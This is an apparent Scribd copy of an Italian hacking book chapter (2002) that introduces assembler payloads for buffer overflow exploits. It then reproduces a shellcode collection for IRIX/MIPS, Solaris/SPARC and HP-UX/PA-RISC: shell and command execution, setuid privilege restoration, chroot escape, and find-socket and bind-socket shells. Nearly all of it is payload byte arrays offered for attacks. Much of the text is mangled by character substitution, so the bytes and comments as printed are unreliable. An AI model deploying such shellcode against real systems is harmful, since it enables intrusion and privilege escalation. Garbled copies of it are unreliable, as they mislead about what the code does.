P. 1
HackerProgrammingBook Part 18

HackerProgrammingBook Part 18

|Views: 27|Likes:
Published by Flavio Bernardotti

More info:

Published by: Flavio Bernardotti on Nov 01, 2012
Copyright:Attribution Non-commercial

Availability:

Read on Scribd mobile: iPhone, iPad and Android.
download as PDF, TXT or read online from Scribd
See more
See less

04/06/2013

pdf

text

original

Hacker’s Programming Book

Codici assembler per usi legati ai buffers
Fino ad ora abbiamo parlato delle tecniche che avrebbero dovuto permettere di inserire
dentro a dei buffers i codici da fare eseguire tramite la soprascrittura degli indirizzi di ritorno.
In altre parole all’interno dei vari buffer overflow è necessario inserire dei codici assembler
per cui il problema spesso è quello di non essere in grado di scrivere le varie parti di codice
che chiaramente devono essere specifiche per il processore attaccato.
Mediante la varie routine di analisi è necessario cercare di capire anche l’architettura
interessata in quanto chiaramente un codice scritto in asembler per un sistema LIN! su
architettura !"# non funzioner$ su un processore MI%&.
'ui a seguito vi riporto i codici assembler per vari scopi e varie architetture.
In generale gli scopi sono questi (
&hell )*ecution( execl(“/bin/sh”, “/bin/sh”, 0);
&hell &ingle +ommand )*ecution( execl(“/bin/sh”, “/bin/sh”, “-c”, cmd, 0);
%rivilege ,estoration( setuid(0);
seteuid(0);
setreuid(getuid(), 0);
setreuid(0,0);
setresuid(0,0,0);
+hroot Limited )nviroment )scape( mkdir(“a...”, mode);
chroot(“a..”);
for(I!"#;I--;I$0) chdir(“..”);
chroot(“.”);
Find &oc-et +ode .findsc-code/( %si&eof(sockaddr'in);
for(i!"(;i$0;i--))
if(get*eername(sck,+adr,+%)-,)
continue;
if(-((unsigned
short)+(adr.!/))htons(*ort))
break;
0
for(%!;%$0;%--) du*!(%,i);
Networ- server code .bindsc-code/( scksocket(12'I345,6789'65:41;,0);
bind(sck,addr,si&eof(addr));
listen(sck,");
cltacce*t(sck,3<==,0);
for(i!;i$0;i--) du*!(i,clt);
&tac- pointer retrieval .0ump/( int s*(-(int(-)())%um*)();
1d ogni modo la cdifica asembler la potete trovare nelle pagine che seguono e sono riassunti
nella seguente tabella.
*rocessor s>stem ?ersion * 6 8 @ : 2 A
---------- ----------- ---------------------------------------- -------------
mi*s irix ".B (.! (.B (.C (." (.".,0 - x x x x x x
s*arc solaris !.( !.# !.D - x x x x x x
*arisc h*-ux ,0.!0 - x x x x x x
*oEer*c aix C., C.! C.B x x x x x x x
al*ha ultrix ".0 - x x x - - -
xD( solaris !.( !.# !.D x x x x x x x
xD( beos ".0 - x x - - - -
xD( linux (.! (redhat) - x x x x x x
xD( o*enbsd !.D - x x x x x x
xD( freebsd B.C - x x x x x x
xD( netbsd ,." - x x x x x x
xD( o*enser?er ".0.C x x x x x - -
xD( unixEare #.0 x x x x x x -
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
Fo?e le lettere s*ecificano G
* - *refix
6 - interacti?e shell
8 - single command
@ - restore *ri?ileges
: - esca*e chroot %ail
2 - find socket
A - bind socket
IRIX/MIPS codes, file: mips-irix
/-HH co*>right =165 651I4 72 F4=I:I<; feb !00, *oland -G//lsd-*l.net/ H-/
/-HH asmcodes for irix ".B (.! (.B (.C (." (.".,0 mi*s H-/
/-
s>scall J?0 Ja0,Ja,,Ja!,JaB
----------- ---- ---------------------------------------------------------------
exec? xBfB -$*athK/bin/shK,-$.-$a0*ath,0/
exec? xBfB -$*athK/bin/shK,-$.-$a0*ath,-$a,K-cK,-$a!cmd,0/
getuid xC00
setreuid xC(C ruid,euid0
mkdir xCBD -$*athKa..K,mode (each ?alue is ?alid)
chroot xC!" -$*ath)Ka..K,K.K0
chdir xBfC -$*athK..K
get*eername xCC" sfd,-$sadr./,-$.len(0"0!D#"!/
socket xC"B 12'I345!,6789'65:41;!,*rot0
bind xCC! sfd,-$sadr.0xB0,!,hi,lo,0,0,0,0/,len0x,0
listen xCCD sfd,backlog"
acce*t xCC, sfd,0,0
close xBee fd)0,,,!0
du* xC,, sfd
-/
Hif defined(;I@6) ++ defined(I:IL)
char shellcode./ /- M-CN# b>tes -/
KOx0COx,0OxffOxffK /- blt&al P&ero,Qshellcode$ -/
KOx!COx0!Ox0BOxfBK /- li P?0,,0,, -/
KOx!BOxffOx0,Ox,CK /- addi Pra,Pra,!#( -/
KOx!BOxeCOxffOx0DK /- addi Pa0,Pra,-!CD -/
KOx!BOxe"OxffOx,0K /- addi Pa,,Pra,-!!0 -/
KOxafOxeCOxffOx,0K /- sE Pa0,-!!0(Pra) -/
KOxafOxe0OxffOx,CK /- sE P&ero,-!B((Pra) -/
KOxaBOxe0OxffOx0fK /- sb P&ero,-!C,(Pra) -/
KOx0BOxffOxffOxccK /- s>scall -/
K/bin/shK
;
char cmdshellcode./ /- ,C-CN,!Ncmdlen b>tes -/
KOx0COx,0OxffOxffK /- blt&al P&ero,Qcmdshellcode$ -/
KOx!COx0!Ox0BOxfBK /- li P?0,,0,, -/
KOx!BOxffOx0DOxf0K /- addi Pra,Pra,!!DD -/
KOx!BOxeCOxf#OxC0K /- addi Pa0,Pra,-!!C0 -/
KOx!BOxe"OxfbOx!CK /- addi Pa,,Pra,-,!CC -/
KOxafOxeCOxfbOx!CK /- sE Pa0,-,!CC(Pra) -/
KOx!BOxe(Oxf#OxCDK /- addi Pa!,Pra,-!!B! -/
KOxafOxe(OxfbOx!DK /- sE Pa!,-,!C0(Pra) -/
KOx!BOxe(Oxf#OxCcK /- addi Pa!,Pra,-!!!D -/
KOxafOxe(OxfbOx!cK /- sE Pa!,-,!B((Pra) -/
KOxafOxe0OxfbOxB0K /- sE P&ero,-,!B!(Pra) -/
KOxaBOxe0Oxf#OxC#K /- sb P&ero,-!!BB(Pra) -/
KOxaBOxe0Oxf#OxCaK /- sb P&ero,-!!B0(Pra) -/
KOx0BOxffOxffOxccK /- s>scall -/
K/bin/sh -c K
/- command -/
;
char setreuidcode./ /- #-C b>tes -/
KOx!COx0!Ox0COx0,K /- li P?0,,0!CN, -/
KOx!0OxC!OxffOxffK /- addi P?0,P?0,-, -/
KOx0BOxffOxffOxccK /- s>scall -/
KOxB0OxCCOxffOxffK /- andi Pa0,P?0,0xffff -/
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
KOxB0Ox0"OxffOxffK /- andi Pa,,P&ero,0xffff -/
KOx!COx0!Ox0COx(CK /- li P?0,,,!C -/
KOx0BOxffOxffOxccK /- s>scall -/
;
char chrootcode./ /- ,D-C b>tes -/
KOxB0Ox(,..K
KOx0COx,0OxffOxffK /- blt&al P&ero,QchrootcodeNC$ -/
KOxafOxe0OxffOxfDK /- sE P&ero,-D(Pra) -/
KOx!BOxeCOxffOxf"K /- addi Pa0,Pra,-,, -/
KOx!COx0!Ox0COxBDK /- li P?0,,0D0 -/
KOx0BOxffOxffOxccK /- s>scall -/
KOx!BOxeCOxffOxf"K /- addi Pa0,Pra,-,, -/
KOx!COx0!Ox0COx!"K /- li P?0,,0(, -/
KOx0BOxffOxffOxccK /- s>scall -/
KOx!COx,,Ox0,Ox0,K /- li Ps,,!"# -/
KOx!BOxeCOxffOxf(K /- addi Pa0,Pra,-,0 -/
KOx!COx0!Ox0BOxfCK /- li P?0,,0,! -/
KOx0BOxffOxffOxccK /- s>scall -/
KOx!!OxB,OxffOxffK /- addi Ps,,Ps,,-, -/
KOx0(Ox!,OxffOxfbK /- bge& Ps,,QchrootcodeNC0$ -/
KOx!BOxeCOxffOxf#K /- addi Pa0,Pra,-M -/
KOx!COx0!Ox0COx!"K /- li P?0,,0(, -/
KOx0BOxffOxffOxccK /- s>scall -/
;
char findsckcode./ /- !M-C b>tes -/
KOx0COx,0OxffOxffK /- blt&al P&ero,Qfindsckcode$ -/
KOx!COx,0Ox0,OxM0K /- li Ps0,C00 -/
KOx!!Ox,,Ox0,OxMcK /- addi Ps,,Ps0,C,! -/
KOx!!Ox0dOxfeOxMCK /- addi Pt",Ps0,-(C00-B() -/
KOx0BOxedOx(DOx!0K /- add Pt",Pra,Pt" -/
KOx0,Oxa0Oxf0Ox0MK /- %alr PsD,Pt" -/
KOxM#OxebOxffOxc!K /- lhu PtB,-(!(Pra) -/
KOx!COx0cOx,!OxBCK /- li PtC,0x,!BC -/
KOx0,Ox(cOx"DOx!BK /- subu PtB,PtB,PtC -/
KOx!!Ox0dOxfeOxbcK /- addi Pt",Ps0,-(C00-#() -/
KOx,,Ox(0OxffOxfMK /- beR& PtB,QfindsckcodeN,($ -/
KOx!!Ox!COxfeOxdCK /- addi Pa0,Ps,,-B00 -/
KOx!BOxe"OxffOxc0K /- addi Pa,,Pra,-(C -/
KOx!BOxe(OxffOxfcK /- addi Pa!,Pra,-C -/
KOx!COx0!Ox0COxC"K /- li P?0,,0MB -/
KOx0BOxffOxffOxccK /- s>scall -/
KOx!!OxB,OxffOxffK /- addi Ps,,Ps,,-, -/
KOx,0Oxe0OxffOxfCK /- beR& PaB,QfindsckcodeN!C$ -/
KOx!!Ox!bOxfeOxdCK /- addi PtB,Ps,,-B00 -/
KOx,dOx(0OxffOxf#K /- bg&t PtB,QfindsckcodeNCC$ -/
KOx!!Ox0COxfeOx#!K /- addi Pa0,Ps0,-BMD -/
KOx!COx0!Ox0BOxeeK /- li P?0,,00( -/
KOx0BOxffOxffOxccK /- s>scall -/
KOx!!Ox!COxfeOxd"K /- addi Pa0,Ps,,-!MM -/
KOx!COx0!Ox0COx,,K /- li P?0,,0C, -/
KOx0BOxffOxffOxccK /- s>scall -/
KOx!!Ox,0OxffOxffK /- addi Ps0,Ps0,-, -/
KOx!!Ox0bOxfeOx#!K /- addi PtB,Ps0,-BMD -/
KOx0"Ox(,OxffOxf#K /- bge& PtB,QfindsckcodeND0$ -/
;
char bindsckcode./ /- B,-C b>tes -/
KOxB0Ox0!Ox,!OxBCK
KOx0COx,0OxffOxffK /- blt&al P&ero,QbindsckcodeNC$ -/
KOx!COx,,Ox0,OxffK /- li Ps,,",, -/
KOxafOxe0OxffOxfDK /- sE P&ero,-D(Pra) -/
KOx!!Ox!COxfeOx0BK /- addi Pa0,Ps,,-"0M -/
KOx!!Ox!"OxfeOx0BK /- addi Pa,,Ps,,-"0M -/
KOx!!Ox!(OxfeOx0,K /- addi Pa!,Ps,,-",, -/
KOx!COx0!Ox0COx"BK /- li P?0,,,0# -/
KOx0BOxffOxffOxccK /- s>scall -/
KOxB0OxCCOxffOxffK /- andi Pa0,P?0,0xffff -/
KOx!BOxe"OxffOxfCK /- addi Pa,,Pra,-,! -/
KOx!!Ox!(OxfeOx,,K /- addi Pa!,Ps,,-(",,-,() -/
KOx!COx0!Ox0COxC!K /- li P?0,,0M0 -/
KOx0BOxffOxffOxccK /- s>scall -/
KOx!!Ox!"OxfeOx0(K /- addi Pa,,Ps,,-"0( -/
KOx!COx0!Ox0COxCDK /- li P?0,,0M( -/
KOx0BOxffOxffOxccK /- s>scall -/
KOx!!Ox!"OxfeOx0,K /- addi Pa,,Ps,,-",, -/
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
KOx!!Ox!(OxfeOx0,K /- addi Pa!,Ps,,-",, -/
KOx!COx0!Ox0COxC,K /- li P?0,,0DM -/
KOx0BOxffOxffOxccK /- s>scall -/
KOx0!Ox!!OxMDOx!0K /- add PsB,Ps,,P?0 -/
KOx!!OxB!OxfeOx0BK /- addi Ps!,Ps,,-"0M -/
KOx0!OxC0Ox!0Ox!"K /- mo?e Pa0,Ps! -/
KOx!COx0!Ox0BOxeeK /- li P?0,,00( -/
KOx0BOxffOxffOxccK /- s>scall -/
KOx!!Ox(COxfeOx0,K /- addi Pa0,PsB,-",, -/
KOx!COx0!Ox0COx,,K /- li P?0,,0C, -/
KOx0BOxffOxffOxccK /- s>scall -/
KOx!!Ox"!OxffOxffK /- addi Ps!,Ps!,-, -/
KOx0(OxC,OxffOxfDK /- bge& Ps!,QbindsckcodeNM!$ -/
;
char %um*./
KOx0BOxa0Ox,0Ox!"K /- mo?e P?0,Ps* -/
KOx0BOxe0Ox00Ox0DK /- %r Pra -/
;
Hdefine 2I3F689@7:5726 B0
Hdefine AI3F689@7:5726 !
Hendif
Solaris/SPARC codes, file: sparc-solaris
/-HH co*>right =165 651I4 72 F4=I:I<; feb !00, *oland -G//lsd-*l.net/ H-/
/-HH asmcodes for solaris !.( !.# !.D s*arc H-/
/-
s>scall Jg, Jo0,Jo,,Jo!,JoB,JoC
----------- ---- ---------------------------------------------------------------
exec x00b -$*athK/bin/kshK,-$.-$a0*ath,0/
exec x00b -$*athK/bin/kshK,-$.-$a0*ath,-$a,K-cK,-$a!cmd,0/
setuid x0,# uid0
mkdir x0"0 -$*athKb..K,mode (each ?alue is ?alid)
chroot x0Bd -$*ath)Kb..K,K.K0
chdir x00c -$*athK..K
ioctl x0B( sfd,5I'I45@44:31;40x"CM,,-$.mlen0x"C,len0x"C,-$sadr.//
so'socket x0e( 12'I345!,6789'65:41;!,*rot0,de?*ath0,67S'F421<=5,
bind x0eD sfd,-$sadr.0xBB,!,hi,lo,0,0,0,0/,len0x,0,67S'678965:41;!
listen x0eM sfd,backlog",?ers (not reRuired in this s>scall)
acce*t x0ea sfd,0,0,?ers (not reRuired in this s>scall)
fcntl x0Be sfd,2'F<@!2F0x0M,fd)0,,,!0
-/
Hif defined(6@1:8) ++ defined(67=1:I6)
Hifdef 1A7S4'6@1:8SD@=<6
char shellcode./ /- D-CND b>tes -/
KOxMfOxC,OxC0Ox0,K /- rd J*c,Jo# T $ s*arc?DN -/
KOxM0Ox0BOxe0Ox!0K /- add Jo#,B!,Jo0 -/
KOxM!Ox0!Ox!0Ox,0K /- add Jo0,,(,Jo, -/
KOxc0Ox!!Ox!0Ox0DK /- st Jg0,.Jo0ND/ -/
KOxd0Ox!!Ox!0Ox,0K /- st Jo0,.Jo0N,(/ -/
KOxc0Ox!!Ox!0Ox,CK /- st Jg0,.Jo0N!0/ -/
KOxD!Ox,0Ox!0Ox0bK /- mo? 0x0b,Jg, -/
KOxM,Oxd0Ox!0Ox0DK /- ta D -/
K/bin/kshK
;
Hendif
char shellcode./ /- ,0-CND b>tes -/
KOx!0OxbfOxffOxffK /- bn,a Qshellcode-C$ -/
KOx!0OxbfOxffOxffK /- bn,a Qshellcode$ -/
KOx#fOxffOxffOxffK /- call QshellcodeNC$ -/
KOxM0Ox0BOxe0Ox!0K /- add Jo#,B!,Jo0 -/
KOxM!Ox0!Ox!0Ox,0K /- add Jo0,,(,Jo, -/
KOxc0Ox!!Ox!0Ox0DK /- st Jg0,.Jo0ND/ -/
KOxd0Ox!!Ox!0Ox,0K /- st Jo0,.Jo0N,(/ -/
KOxc0Ox!!Ox!0Ox,CK /- st Jg0,.Jo0N!0/ -/
KOxD!Ox,0Ox!0Ox0bK /- mo? 0x0b,Jg, -/
KOxM,Oxd0Ox!0Ox0DK /- ta D -/
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
K/bin/kshK
;
char cmdshellcode./ /- ,"-CN,(Ncmdlen b>tes -/
KOx!0OxbfOxffOxffK /- bn,a Qcmdshellcode-C$ -/
KOx!0OxbfOxffOxffK /- bn,a Qcmdshellcode$ -/
KOx#fOxffOxffOxffK /- call QcmdshellcodeNC$ -/
KOxM0Ox0BOxe0OxBCK /- add Jo#,"!,Jo0 -/
KOxM!Ox!BOxe0Ox!0K /- sub Jo#,B!,Jo, -/
KOxa!Ox0!Ox!0Ox0cK /- add Jo0,,!,Jl, -/
KOxaCOx0!Ox!0Ox,0K /- add Jo0,,(,Jl! -/
KOxc0Ox!aOx!0Ox0DK /- stb Jg0,.Jo0ND/ -/
KOxc0Ox!aOx!0Ox0eK /- stb Jg0,.Jo0N,C/ -/
KOxd0Ox!BOxffOxe0K /- st Jo0,.Jo#-B!/ -/
KOxe!Ox!BOxffOxeCK /- st Jl,,.Jo#-!D/ -/
KOxeCOx!BOxffOxeDK /- st Jl!,.Jo#-!C/ -/
KOxc0Ox!BOxffOxecK /- st Jg0,.Jo#-!0/ -/
KOxD!Ox,0Ox!0Ox0bK /- mo? 0x0b,Jg, -/
KOxM,Oxd0Ox!0Ox0DK /- ta D -/
K/bin/ksh -c K
/- command -/
;
char setuidcode./ /- B-C b>tes -/
KOxM0Ox0DOx!0Ox0,K /- and Jg0,,,Jo0 -/
KOxD!Ox,0Ox!0Ox,#K /- mo? 0x,#,Jg, -/
KOxM,Oxd0Ox!0Ox0DK /- ta D -/
;
char chrootcode./ /- !0-C b>tes -/
KOx!0OxbfOxffOxffK /- bn,a Qchrootcode-C$ -/
KOx!0OxbfOxffOxffK /- bn,a Qchrootcode$ -/
KOx#fOxffOxffOxffK /- call QchrootcodeNC$ -/
KOxD0Ox(,..K
KOxc0Ox!bOxe0Ox0DK /- stb Jg0,.Jo#ND/ -/
KOxM0Ox0BOxe0Ox0"K /- add Jo#,",Jo0 -/
KOxD!Ox,0Ox!0Ox"0K /- mo? 0x"0,Jg, -/
KOxM,Oxd0Ox!0Ox0DK /- ta D -/
KOxM0Ox0BOxe0Ox0"K /- add Jo#,",Jo0 -/
KOxD!Ox,0Ox!0OxBdK /- mo? 0xBd,Jg, -/
KOxM,Oxd0Ox!0Ox0DK /- ta D -/
KOxaaOx!0OxBfOxe0K /- sub Jg0,-B!,Jl" -/
KOxM0Ox0BOxe0Ox0(K /- add Jo#,(,Jo0 -/
KOxD!Ox,0Ox!0Ox0cK /- mo? 0x0c,Jg, -/
KOxaaOxD"Ox#fOxffK /- addcc Jl",-,,Jl" -/
KOx,!OxbfOxffOxfdK /- ble QchrootcodeNCD$ -/
KOxM,Oxd0Ox!0Ox0DK /- ta D -/
KOxM0Ox0BOxe0Ox0#K /- add Jo#,#,Jo0 -/
KOxD!Ox,0Ox!0OxBdK /- mo? 0xBd,Jg, -/
KOxM,Oxd0Ox!0Ox0DK /- ta D -/
;
char findsckcode./ /- B"-C b>tes -/
KOx!0OxbfOxffOxffK /- bn,a Qfindsckcode-C$ -/
KOx!0OxbfOxffOxffK /- bn,a Qfindsckcode$ -/
KOx#fOxffOxffOxffK /- call QfindsckcodeNC$ -/
KOxBBOx0!Ox,!OxBCK
KOxa0Ox,0Ox!0OxffK /- mo? 0xff,Jl0 -/
KOxa!Ox,0Ox!0Ox"CK /- mo? 0x"C,Jl, -/
KOxaCOx0BOxffOxd0K /- add Jo#,-CD,Jl! -/
KOxaaOx0BOxe0Ox!DK /- add Jo#,C0,Jl" -/
KOxD,Oxc"Ox(0Ox0DK /- %m* Jl"ND -/
KOxc0Ox!bOxe0Ox0CK /- stb Jg0,.Jo#NC/ -/
KOxe(Ox0BOxffOxd0K /- ld .Jo#-CD/,JlB -/
KOxeDOx0BOxe0Ox0CK /- ld .Jo#NC/,JlC -/
KOxaDOxaCOxc0Ox,CK /- subcc JlB,JlC,JlC -/
KOx0!OxbfOxffOxfbK /- b& QfindsckcodeNB!$ -/
KOxaaOx0BOxe0Ox"cK /- add Jo#,M!,Jl" -/
KOxe!Ox!BOxffOxcCK /- st Jl,,.Jo#-(0/ -/
KOxe!Ox!BOxffOxcDK /- st Jl,,.Jo#-"(/ -/
KOxeCOx!BOxffOxccK /- st Jl!,.Jo#-"!/ -/
KOxM0Ox0COx!0Ox0,K /- add Jl0,,,Jo0 -/
KOxa#Ox!cOx(0Ox0DK /- sll Jl,,D,JlB -/
KOxM!Ox,COxe0OxM,K /- or JlB,0xM,,Jo, -/
KOxMCOx0BOxffOxcCK /- add Jo#,-(0,Jo! -/
KOxD!Ox,0Ox!0OxB(K /- mo? 0xB(,Jg, -/
KOxM,Oxd0Ox!0Ox0DK /- ta D -/
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
KOx,aOxbfOxffOxf,K /- bcc QfindsckcodeNB($ -/
KOxa0OxaCOx!0Ox0,K /- deccc Jl0 -/
KOx,!OxbfOxffOxf"K /- bne QfindsckcodeN(0$ -/
KOxa(Ox,0Ox!0Ox0BK /- mo? 0x0B,JlB -/
KOxM0Ox0COx!0Ox0!K /- add Jl0,!,Jo0 -/
KOxM!Ox,0Ox!0Ox0MK /- mo? 0x0M,Jo, -/
KOxMCOx0COxffOxffK /- add JlB,-,,Jo! -/
KOxD!Ox,0Ox!0OxBeK /- mo? 0xBe,Jg, -/
KOxa(OxDCOxffOxffK /- addcc JlB,-,,JlB -/
KOx,!OxbfOxffOxfbK /- bne QfindsckcodeN,,!$ -/
KOxM,Oxd0Ox!0Ox0DK /- ta D -/
;
char bindsckcode./ /- BC-C b>tes -/
KOx!0OxbfOxffOxffK /- bn,a Qbindsckcode-C$ -/
KOx!0OxbfOxffOxffK /- bn,a Qbindsckcode$ -/
KOx#fOxffOxffOxffK /- call QbindsckcodeNC$ -/
KOxBBOx0!Ox,!OxBCK
KOxM0Ox,0Ox!0Ox0!K /- mo? 0x0!,Jo0 -/
KOxM!Ox,0Ox!0Ox0!K /- mo? 0x0!,Jo, -/
KOxMCOx0DOx!0Ox0,K /- and Jg0,,,Jo! -/
KOxM(Ox0DOx!0Ox0,K /- and Jg0,,,JoB -/
KOxMDOx,0Ox!0Ox0,K /- mo? 0x0,,JoC -/
KOxD!Ox,0Ox!0Oxe(K /- mo? 0xe(,Jg, -/
KOxM,Oxd0Ox!0Ox0DK /- ta D -/
KOxa!Ox!!OxBfOxffK /- sub Jo0,-,,Jl, -/
KOxc0Ox!BOxe0Ox0DK /- st Jg0,.Jo#ND/ -/
KOxM!Ox0BOxe0Ox0CK /- add Jo#,C,Jo, -/
KOxMCOx,0Ox!0Ox,0K /- mo? 0x,0,Jo! -/
KOxM(Ox,0Ox!0Ox0!K /- mo? 0x0!,JoB -/
KOxD!Ox,0Ox!0OxeDK /- mo? 0xeD,Jg, -/
KOxM,Oxd0Ox!0Ox0DK /- ta D -/
KOxM0Ox0COx#fOxffK /- add Jl,,-,,Jo0 -/
KOxM!Ox,0Ox!0Ox0"K /- mo? 0x0",Jo, -/
KOxD!Ox,0Ox!0OxeMK /- mo? 0xeM,Jg, -/
KOxM,Oxd0Ox!0Ox0DK /- ta D -/
KOxM0Ox0COx#fOxffK /- add Jl,,-,,Jo0 -/
KOxM!Ox0DOx!0Ox0,K /- and Jg0,,,Jo, -/
KOxMCOx0DOx!0Ox0,K /- and Jg0,,,Jo! -/
KOxD!Ox,0Ox!0OxeaK /- mo? 0xea,Jg, -/
KOxM,Oxd0Ox!0Ox0DK /- ta D -/
KOxa(Ox,0Ox!0Ox0BK /- mo? 0x0B,JlB -/
KOxM!Ox,0Ox!0Ox0MK /- mo? 0x0M,Jo, -/
KOxMCOx0COxffOxffK /- add JlB,-,,Jo! -/
KOxD!Ox,0Ox!0OxBeK /- mo? 0xBe,Jg, -/
KOxa(OxDCOxffOxffK /- addcc JlB,-,,JlB -/
KOx,!OxbfOxffOxfcK /- bne QbindsckcodeN,,!$ -/
KOxM,Oxd0Ox!0Ox0DK /- ta D -/
;
char %um*./
KOxD,OxcBOxe0Ox0DK /- %m* Jo#ND -/
KOxM0Ox,0Ox00Ox0eK /- mo? Js*,Jo0 -/
;
Hdefine 2I3F689@7:5726 ,C
Hdefine AI3F689@7:5726 ,C
Hendif
HP-UX/PA-RISC codes, file: parisc-hpux
/-HH co*>right =165 651I4 72 F4=I:I<; feb !00, *oland -G//lsd-*l.net/ H-/
/-HH asmcodes for h*-ux ,0.!0 *arisc H-/
/-
s>scall Jr!! Jr!(,Jr!",Jr!C,Jr!B
----------- ---- ---------------------------------------------------------------
exec? x00b -$*athK/bin/shK,0
exec? x00b -$*athK/bin/shK,-$.-$a0*ath,-$a,K-cK,-$a!cmd,0/
setresuid x0#e 0,0,0
mkdir x0DD -$*athKa..K,mode (each ?alue is ?alid)
chroot x0Bd -$*ath)Ka..K,K.K0
chdir x00c -$*athK..K
get*eername x,,( sfd,-$sadr./,-$.0x,0/
socket x,!! 12'I345!,6789'65:41;,,*rot0
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
bind x,,C sfd,-$sadr.0x(,,!,hi,lo,0,0,0,0/,len0x,0
listen x,,M sfd,backlog"
acce*t x,,B sfd,0,0
du*! x0"a sfd,fd)0,,,!0
-/
Hif defined(@1:I68) ++ defined(U@<L)
char shellcode./ /- #-CND b>tes -/
KOxebOx"fOx,fOxfdK /- bl QshellcodeNC$,Jr!( -/
KOx0bOxBMOx0!OxMMK /- xor Jr!",Jr!",Jr!" -/
KOxb#Ox"aOxC0Ox!!K /- addi,Q 0x,,,Jr!(,Jr!( -/
KOx0fOxC0Ox,!Ox0eK /- stbs Jr0,#(Jr!() -/
KOx!0Ox!0Ox0DOx0,K /- ldil =J0xc000000C,Jr, -/
KOxeCOx!0Oxe0Ox0DK /- ble :J0xc000000C(Jsr#,Jr,) -/
KOxbCOx,(Ox#0Ox,(K /- addi,$ 0xb,Jr0,Jr!! -/
K/bin/shK
;
char cmdshellcode./ /- ,C-CN,!Ncmdlen b>tes -/
KOxebOx"fOx,fOxfdK /- bl QcmdshellcodeNC$,Jr!( -/
KOx!0Ox!0Ox0DOx0,K /- ldil =J0xc000000C,Jr, -/
KOxb#Ox"aOxC0Ox"aK /- addi,Q 0x!d,Jr!(,Jr!( -/
KOxb#Ox"(OxC0Ox,0K /- addi,Q 0xD,Jr!(,Jr!! -/
KOxb#Ox""OxC0Ox,DK /- addi,Q 0xc,Jr!(,Jr!, -/
KOx0fOxC0Ox,!Ox0eK /- stbs Jr0,0x#(Jr!() -/
KOx0fOxC0Ox,!Ox,CK /- stbs Jr0,0xa(Jr!() -/
KOx(bOx"aOxBfOxMMK /- stE Jr!(,-0xBC(Jr!() -/
KOx(bOx"(OxBfOxa,K /- stE Jr!!,-0xB0(Jr!() -/
KOx(bOx""OxBfOxaMK /- stE Jr!,,-0x!c(Jr!() -/
KOx(bOxC0OxBfOxb,K /- stE Jr0, -0x!D(Jr!() -/
KOxb#Ox"MOxC#OxMMK /- addi,Q -0xBC,Jr!(,Jr!" -/
KOxeCOx!0Oxe0Ox0DK /- ble :J0xc000000C(Jsr#,Jr,) -/
KOxbCOx,(Ox#0Ox,(K /- addi,$ 0x0b,Jr0,Jr!! -/
K/bin/sh -c K
/- command -/
;
char setresuidcode./ /- (-C b>tes -/
KOx0bOx"aOx0!OxMaK /- xor Jr!(,Jr!(,Jr!( -/
KOx0bOxBMOx0!OxMMK /- xor Jr!",Jr!",Jr!" -/
KOx0bOx,DOx0!OxMDK /- xor Jr!C,Jr!C,Jr!C -/
KOx!0Ox!0Ox0DOx0,K /- ldil =J0xc000000C,Jr, -/
KOxeCOx!0Oxe0Ox0DK /- ble :J0xc000000C(Jsr#,Jr,) -/
KOxbCOx,(Ox#0OxfcK /- addi,$ 0x#e,Jr0,Jr!! -/
;
char chrootcode./ /- !C-C b>tes -/
KOxbCOx,#OxC0Ox0CK /- addi,Q 0x!,Jr0,Jr!B -/
KOxebOx"#OxC0Ox0!K /- blr,n Jr!B,Jr!( -/
KOx!0Ox!0Ox0DOx0,K /- ldil =J0xc000000C,Jr, -/
KOxeCOx!0Oxe0Ox0DK /- ble :J0xc000000C(Jsr#,Jr,) -/
KOx0aOxf#Ox0!OxM#K /- xor Jr!B,Jr!B,Jr!B -/
KOxeDOxC0Oxc0Ox0!K /- b?,n 0(Jr*) -/
KOx(,Ox!eOx!eOx!eK /- a... -/
KOxb#Ox"aOxC0Ox,!K /- addi,Q 0xM,Jr!(,Jr!( -/
KOx0DOx,aOx0(Ox0cK /- add Jr!(,Jr0,Jr,! -/
KOx0dOxD0Ox,!Ox0(K /- stbs Jr0,0xB(Jr,!) -/
KOxeDOx"fOx,fOxadK /- bl QchrootcodeNC$,Jr* -/
KOxbCOx,(Ox#,Ox,0K /- addi,$ 0xDD,Jr0,Jr!! -/
KOx0DOx0cOx0(Ox,aK /- add Jr,!,Jr0,Jr!( -/
KOxeDOx"fOx,fOxM"K /- bl QchrootcodeNC$,Jr* -/
KOxbCOx,(Ox#0Ox#aK /- addi,$ 0xBd,Jr0,Jr!! -/
KOxbCOx0dOx0,OxfeK /- addi 0xff,Jr0,Jr,B -/
KOxb"OxMaOxC0Ox0!K /- addi,Q 0x,,Jr,!,Jr!( -/
KOxeDOx"fOx,fOx#"K /- bl QchrootcodeNC$,Jr* -/
KOxbCOx,(Ox#0Ox,DK /- addi,$ 0xc,Jr0,Jr!! -/
KOxDDOx0dOxBfOxddK /- combf, Jr,B,Jr0,QchrootcodeN(C$ -/
KOxb"OxadOx0#OxffK /- addi -0x,,Jr,B,Jr,B -/
KOxb"OxMaOxC0Ox0CK /- addi,Q 0x!,Jr,!,Jr!( -/
KOxeDOx"fOx,fOxCdK /- bl QchrootcodeNC$,Jr* -/
KOxbCOx,(Ox#0Ox#aK /- addi,$ 0xBd,Jr0,Jr!! -/
;
char findsckcode./ /- B0-C b>tes -/
KOxeMOxMfOx,fOxfdK /- bl QfindsckcodeNC$,Jr,! -/
KOx0bOx,DOx0!OxMDK /- xor Jr!C,Jr!C,Jr!C -/
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
KOxbCOx0eOx0,OxdeK /- addi 0xef,Jr0,Jr,C -/
KOxb"OxMDOx0#OxdBK /- addi -0x,#,Jr,!,Jr!C -/
KOxb"OxMMOx0#OxdbK /- addi -0x,B,Jr,!,Jr!" -/
KOx0DOx0eOx0(Ox,aK /- add Jr,C,Jr0,Jr!( -/
KOx!0Ox!0Ox0DOx0,K /- ldil =J0xc000000C,Jr, -/
KOxeCOx!0Oxe0Ox0DK /- ble :J0xc000000C(Jsr#,Jr,) -/
KOxbCOx,(Ox0!Ox!cK /- addi 0x,,(,Jr0,Jr!! -/
